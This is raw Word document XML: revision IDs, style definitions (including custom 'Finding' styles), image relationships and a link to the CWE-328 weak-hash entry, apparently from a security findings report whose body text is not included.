    <w:rsid w:val="3B8CC773"/>
    <w:rsid w:val="3B93CA14"/>
    <w:rsid w:val="3B97CB73"/>
    <w:rsid w:val="3BDCB27A"/>
    <w:rsid w:val="3C0C3937"/>
    <w:rsid w:val="3C52D6CA"/>
    <w:rsid w:val="3CAA5649"/>
    <w:rsid w:val="3CE79BAB"/>
    <w:rsid w:val="3CF8EA00"/>
    <w:rsid w:val="3D1C4ABA"/>
    <w:rsid w:val="3D48C2D2"/>
    <w:rsid w:val="3E467E5B"/>
    <w:rsid w:val="3E4D9863"/>
    <w:rsid w:val="3E6E83AF"/>
    <w:rsid w:val="3EADE2BE"/>
    <w:rsid w:val="3EC200DF"/>
    <w:rsid w:val="3EEC7943"/>
    <w:rsid w:val="3EEE2980"/>
    <w:rsid w:val="3F0EA6F0"/>
    <w:rsid w:val="3F3D8A29"/>
    <w:rsid w:val="3F43D9F9"/>
    <w:rsid w:val="3FB124B8"/>
    <w:rsid w:val="3FE24EBC"/>
    <w:rsid w:val="3FECC2C3"/>
    <w:rsid w:val="400A5410"/>
    <w:rsid w:val="402B24AB"/>
    <w:rsid w:val="40358724"/>
    <w:rsid w:val="403C98FB"/>
    <w:rsid w:val="4049B31F"/>
    <w:rsid w:val="4067F372"/>
    <w:rsid w:val="40A4E7AB"/>
    <w:rsid w:val="40D27220"/>
    <w:rsid w:val="410F91A1"/>
    <w:rsid w:val="411B84D3"/>
    <w:rsid w:val="414CF519"/>
    <w:rsid w:val="41D0C76C"/>
    <w:rsid w:val="429FB6D1"/>
    <w:rsid w:val="4319EF7E"/>
    <w:rsid w:val="432F9801"/>
    <w:rsid w:val="435F4D72"/>
    <w:rsid w:val="43679D41"/>
    <w:rsid w:val="43C9EA72"/>
    <w:rsid w:val="43DD9DF7"/>
    <w:rsid w:val="440278F1"/>
    <w:rsid w:val="440562A2"/>
    <w:rsid w:val="44A9F563"/>
    <w:rsid w:val="4519A305"/>
    <w:rsid w:val="453307D0"/>
    <w:rsid w:val="45778CFD"/>
    <w:rsid w:val="45A6D217"/>
    <w:rsid w:val="45E302C4"/>
    <w:rsid w:val="466738C3"/>
    <w:rsid w:val="46BCE494"/>
    <w:rsid w:val="46EFA518"/>
    <w:rsid w:val="4707B417"/>
    <w:rsid w:val="471A44BA"/>
    <w:rsid w:val="4776E59F"/>
    <w:rsid w:val="479E81A7"/>
    <w:rsid w:val="47DB7A85"/>
    <w:rsid w:val="4823492B"/>
    <w:rsid w:val="482F626B"/>
    <w:rsid w:val="490928E8"/>
    <w:rsid w:val="4913D4D9"/>
    <w:rsid w:val="4A9D4B8A"/>
    <w:rsid w:val="4AA2D308"/>
    <w:rsid w:val="4B77A9B2"/>
    <w:rsid w:val="4BC80015"/>
    <w:rsid w:val="4BE2A9CE"/>
    <w:rsid w:val="4C01DD75"/>
    <w:rsid w:val="4C059340"/>
    <w:rsid w:val="4C1BF0D9"/>
    <w:rsid w:val="4C240D3E"/>
    <w:rsid w:val="4C30F1F7"/>
    <w:rsid w:val="4C979546"/>
    <w:rsid w:val="4CB1B949"/>
    <w:rsid w:val="4CD67A47"/>
    <w:rsid w:val="4CED8F11"/>
    <w:rsid w:val="4CF6BA4E"/>
    <w:rsid w:val="4D0F0DCA"/>
    <w:rsid w:val="4D1FAAAE"/>
    <w:rsid w:val="4D4E6400"/>
    <w:rsid w:val="4D803177"/>
    <w:rsid w:val="4DC371AE"/>
    <w:rsid w:val="4DCFA5A2"/>
    <w:rsid w:val="4E41FA65"/>
    <w:rsid w:val="4EEA3461"/>
    <w:rsid w:val="4EF5B854"/>
    <w:rsid w:val="4F1C01D8"/>
    <w:rsid w:val="4F5B044B"/>
    <w:rsid w:val="4F7B612C"/>
    <w:rsid w:val="4F9DC5C2"/>
    <w:rsid w:val="4FCF3608"/>
    <w:rsid w:val="4FD55193"/>
    <w:rsid w:val="5019BDB6"/>
    <w:rsid w:val="50EBE74D"/>
    <w:rsid w:val="514E6862"/>
    <w:rsid w:val="5171DA2F"/>
    <w:rsid w:val="528776BF"/>
    <w:rsid w:val="52B99846"/>
    <w:rsid w:val="52D0D44B"/>
    <w:rsid w:val="52FA777B"/>
    <w:rsid w:val="5371659B"/>
    <w:rsid w:val="5382BB97"/>
    <w:rsid w:val="53DA644E"/>
    <w:rsid w:val="5402215E"/>
    <w:rsid w:val="5458E9E4"/>
    <w:rsid w:val="546CE0C7"/>
    <w:rsid w:val="5472286C"/>
    <w:rsid w:val="547D1F7F"/>
    <w:rsid w:val="54863062"/>
    <w:rsid w:val="5582D061"/>
    <w:rsid w:val="5604334E"/>
    <w:rsid w:val="562200C3"/>
    <w:rsid w:val="56ED1D10"/>
    <w:rsid w:val="56F54646"/>
    <w:rsid w:val="57033D49"/>
    <w:rsid w:val="572C8451"/>
    <w:rsid w:val="57636855"/>
    <w:rsid w:val="57A48189"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rsid w:val="57C76E1F"/>
    <w:rsid w:val="5838E7D5"/>
    <w:rsid w:val="585CDFBD"/>
    <w:rsid w:val="58A4FF73"/>
    <w:rsid w:val="590E2635"/>
    <w:rsid w:val="591FFBB8"/>
    <w:rsid w:val="592C5B07"/>
    <w:rsid w:val="5976184E"/>
    <w:rsid w:val="5984812C"/>
    <w:rsid w:val="599962DD"/>
    <w:rsid w:val="5A413BC8"/>
    <w:rsid w:val="5A79EF62"/>
    <w:rsid w:val="5A8C0FB0"/>
    <w:rsid w:val="5AA5B5BA"/>
    <w:rsid w:val="5ADC224B"/>
    <w:rsid w:val="5AE03C72"/>
    <w:rsid w:val="5B83C8D5"/>
    <w:rsid w:val="5C572D3B"/>
    <w:rsid w:val="5CAF13BF"/>
    <w:rsid w:val="5D131B61"/>
    <w:rsid w:val="5D4414F2"/>
    <w:rsid w:val="5D681E37"/>
    <w:rsid w:val="5D7418DF"/>
    <w:rsid w:val="5D86CAA7"/>
    <w:rsid w:val="5DF42A1D"/>
    <w:rsid w:val="5E07B9B0"/>
    <w:rsid w:val="5E171E90"/>
    <w:rsid w:val="5E367C9F"/>
    <w:rsid w:val="5E7EF012"/>
    <w:rsid w:val="5EAEC06B"/>
    <w:rsid w:val="5EB9FF7B"/>
    <w:rsid w:val="5ED720A7"/>
    <w:rsid w:val="5F1D8915"/>
    <w:rsid w:val="5F3A1328"/>
    <w:rsid w:val="5F7D535F"/>
    <w:rsid w:val="604AB6FD"/>
    <w:rsid w:val="60567233"/>
    <w:rsid w:val="60755CC0"/>
    <w:rsid w:val="609997DB"/>
    <w:rsid w:val="614809D0"/>
    <w:rsid w:val="61497CA4"/>
    <w:rsid w:val="614BFA0E"/>
    <w:rsid w:val="61688ABA"/>
    <w:rsid w:val="61C470E5"/>
    <w:rsid w:val="61E6D99D"/>
    <w:rsid w:val="622FC366"/>
    <w:rsid w:val="62478A02"/>
    <w:rsid w:val="625CD3E3"/>
    <w:rsid w:val="626CDBB7"/>
    <w:rsid w:val="63840D22"/>
    <w:rsid w:val="63A76DDC"/>
    <w:rsid w:val="63B3CD2B"/>
    <w:rsid w:val="63FDB0B5"/>
    <w:rsid w:val="64DE23ED"/>
    <w:rsid w:val="652940FF"/>
    <w:rsid w:val="657B1DA2"/>
    <w:rsid w:val="65C43C30"/>
    <w:rsid w:val="65EC94E3"/>
    <w:rsid w:val="65F95EAD"/>
    <w:rsid w:val="661B411E"/>
    <w:rsid w:val="66841C5A"/>
    <w:rsid w:val="66BB44C9"/>
    <w:rsid w:val="66BBADE4"/>
    <w:rsid w:val="66E5A4FB"/>
    <w:rsid w:val="6701D2C8"/>
    <w:rsid w:val="67550883"/>
    <w:rsid w:val="67DD5EE5"/>
    <w:rsid w:val="67E54C6B"/>
    <w:rsid w:val="67EEE2B8"/>
    <w:rsid w:val="681E15E1"/>
    <w:rsid w:val="68B1DDF0"/>
    <w:rsid w:val="69034A59"/>
    <w:rsid w:val="6907E391"/>
    <w:rsid w:val="693B25BD"/>
    <w:rsid w:val="695744A2"/>
    <w:rsid w:val="696E9AE5"/>
    <w:rsid w:val="6981D507"/>
    <w:rsid w:val="69DA2649"/>
    <w:rsid w:val="69F4F041"/>
    <w:rsid w:val="69FCB222"/>
    <w:rsid w:val="6A054BA4"/>
    <w:rsid w:val="6A3EFA2B"/>
    <w:rsid w:val="6A8A213D"/>
    <w:rsid w:val="6A9F1ABA"/>
    <w:rsid w:val="6AC9931E"/>
    <w:rsid w:val="6AD6FA1F"/>
    <w:rsid w:val="6B8AC8E9"/>
    <w:rsid w:val="6BA7D4D5"/>
    <w:rsid w:val="6BB4116D"/>
    <w:rsid w:val="6BCCE0AB"/>
    <w:rsid w:val="6BEF05EF"/>
    <w:rsid w:val="6C06C4D2"/>
    <w:rsid w:val="6C1A9A0C"/>
    <w:rsid w:val="6C4D42D4"/>
    <w:rsid w:val="6CF23693"/>
    <w:rsid w:val="6D227016"/>
    <w:rsid w:val="6D6A6149"/>
    <w:rsid w:val="6D6D072A"/>
    <w:rsid w:val="6D791B07"/>
    <w:rsid w:val="6D79F359"/>
    <w:rsid w:val="6DCAA946"/>
    <w:rsid w:val="6E111580"/>
    <w:rsid w:val="6E9C0D4E"/>
    <w:rsid w:val="6EB5CA11"/>
    <w:rsid w:val="6EC50F8C"/>
    <w:rsid w:val="6EDB9208"/>
    <w:rsid w:val="6F04816D"/>
    <w:rsid w:val="6FD52046"/>
    <w:rsid w:val="7001A8E5"/>
    <w:rsid w:val="70968C32"/>
    <w:rsid w:val="709EE79B"/>
    <w:rsid w:val="7140C228"/>
    <w:rsid w:val="71557E3C"/>
    <w:rsid w:val="71801DDE"/>
    <w:rsid w:val="722C9795"/>
    <w:rsid w:val="72705F94"/>
    <w:rsid w:val="72B238BB"/>
    <w:rsid w:val="72B27756"/>
    <w:rsid w:val="72B9A6B8"/>
    <w:rsid w:val="72D153CD"/>
    <w:rsid w:val="72FC5BDB"/>
    <w:rsid w:val="73859210"/>
    <w:rsid w:val="73E472A2"/>
    <w:rsid w:val="74A8C5E6"/>
    <w:rsid w:val="74DF3185"/>
    <w:rsid w:val="7503ED74"/>
    <w:rsid w:val="754BDBA7"/>
    <w:rsid w:val="755B5A45"/>
    <w:rsid w:val="75DAE9D5"/>
    <w:rsid w:val="763ED2ED"/>
    <w:rsid w:val="76841CBF"/>
    <w:rsid w:val="76D1622C"/>
    <w:rsid w:val="76DC1DBB"/>
    <w:rsid w:val="778C2C3D"/>
    <w:rsid w:val="78AFB9D1"/>
    <w:rsid w:val="791DFA28"/>
    <w:rsid w:val="79A37CC4"/>
    <w:rsid w:val="79BBB39C"/>
    <w:rsid w:val="7A14F405"/>
    <w:rsid w:val="7A981B13"/>
    <w:rsid w:val="7AECD67E"/>
    <w:rsid w:val="7B2C39BD"/>
    <w:rsid w:val="7B5B324A"/>
    <w:rsid w:val="7BA8C82B"/>
    <w:rsid w:val="7BEAF1FB"/>
    <w:rsid w:val="7C1F2F60"/>
    <w:rsid w:val="7CD77CE1"/>
    <w:rsid w:val="7CF3656F"/>
    <w:rsid w:val="7D59A31C"/>
    <w:rsid w:val="7DAA3429"/>
    <w:rsid w:val="7DB3123B"/>
    <w:rsid w:val="7E6AB1B9"/>
    <w:rsid w:val="7E77DB64"/>
    <w:rsid w:val="7ED4892E"/>
    <w:rsid w:val="7F0B1A9D"/>
    <w:rsid w:val="7FDAD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93B78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{00133453-559A-4067-BFA0-59E1A10B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57C4D39E"/>
    <w:rPr>
      <w:noProof w:val="0"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:uiPriority w:val="9"/>
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:spacing w:before="120" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:uiPriority w:val="9"/>
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:link w:val="Ttulo2Car"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39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uiPriority w:val="1"/>
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TtuloCar"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="" w:cs="" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="TtuloCar" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="Título Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="" w:cs="" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:noProof w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TitlePage-Version" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="Title Page - Version"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman" w:eastAsiaTheme="minorAscii"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo1Car" w:customStyle="true">
    <w:uiPriority w:val="9"/>
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo1"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:noProof w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC1">
    <w:uiPriority w:val="39"/>
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman" w:eastAsiaTheme="minorAscii"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
    </w:rPr>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:uiPriority w:val="39"/>
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman" w:eastAsiaTheme="minorAscii"/>
    </w:rPr>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="403"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:uiPriority w:val="39"/>
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman" w:eastAsiaTheme="minorAscii"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Spacer" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="*Spacer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="" w:eastAsiaTheme="minorAscii" w:cstheme="minorBidi"/>
      <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyBlockLabelnonTOC" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="*Body Block Label (non TOC)"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableText-Small" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="Table Text - Small"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Table-HeaderText" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="Table - Header Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo2Car" w:customStyle="true">
    <w:uiPriority w:val="9"/>
    <w:name w:val="Título 2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:semiHidden/>
    <w:link w:val="Ttulo2"/>
    <w:rsid w:val="57C4D39E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w:type="paragraph" w:styleId="BodyBlockLine" w:customStyle="1">
    <w:name w:val="*Body Block Line"/>
    <w:basedOn w:val="Spacer"/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B0F"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1620"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="auto"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Finding" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="*Finding"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FindingTableLabel" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="*Finding Table Label"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="" w:eastAsiaTheme="minorAscii" w:cstheme="minorBidi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
    </w:rPr>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="720" w:right="-170" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableText" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr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8F1064"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD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7C4D39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7C4D39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7C4D39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7C4D39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57C4D39E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7C4D39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7C4D39E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7C4D39E"/>
    <w:pPr>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="true">
    <w:uiPriority w:val="9"/>
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Heading3"/>
    <w:rsid w:val="57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="Heading4"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Fuentedeprrafopredeter"/>
    <w:link w:val="Heading5"/>
    <w:rsid w:val="57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="Heading6"/>
    <w:rsid w:val="57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="Heading7"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Fuentedeprrafopredeter"/>
    <w:link w:val="Heading8"/>
    <w:rsid w:val="57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="Heading9"/>
    <w:rsid w:val="57C4D39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SubtitleChar" w:customStyle="true">
    <w:uiPriority w:val="11"/>
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Subtitle"/>
    <w:rsid w:val="57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="Quote"/>
    <w:rsid w:val="57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="IntenseQuote"/>
    <w:rsid w:val="57C4D39E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4">
    <w:uiPriority w:val="39"/>
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="57C4D39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7C4D39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7C4D39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7C4D39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7C4D39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7C4D39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7C4D39E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Fuentedeprrafopredeter"/>
    <w:semiHidden/>
    <w:link w:val="EndnoteText"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:noProof w:val="0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57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="Footer"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:noProof w:val="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7C4D39E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Fuentedeprrafopredeter"/>
    <w:semiHidden/>
    <w:link w:val="FootnoteText"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:noProof w:val="0"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57C4D39E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Fuentedeprrafopredeter"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="57C4D39E"/>
    <w:rPr>
      <w:noProof w:val="0"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jpg" Id="R706c216dfd5e41ab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="Rd51562b4a3714dbf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R00eaa7acb52344e0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R604f9dcde24f4682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="Rb21d93f572174b66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R20609e2da5ef4b05" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R66446e6af450465b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R3642f61bfa474013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="R226c70d6149542e4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="R0e3bb548bb444f8b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="R4cb0085461c6437e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R2669991f2f004203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R9901f301298b48e2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="R9ec7fe1ae08c46d2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="R08096828d510490c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R622af620ca9e4f85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Rc790edc5153c4500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="Rce175254234a4090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="R190dc598ca2b4a70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R1404170d76cd499f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="R9ff14baae07a4124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="Rd7eae006458f4b9e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="Ra8f4d09250bb49ed" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="Rb6a5a44e5c384556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/328.html" TargetMode="External" Id="Rc194a540caa54f20" 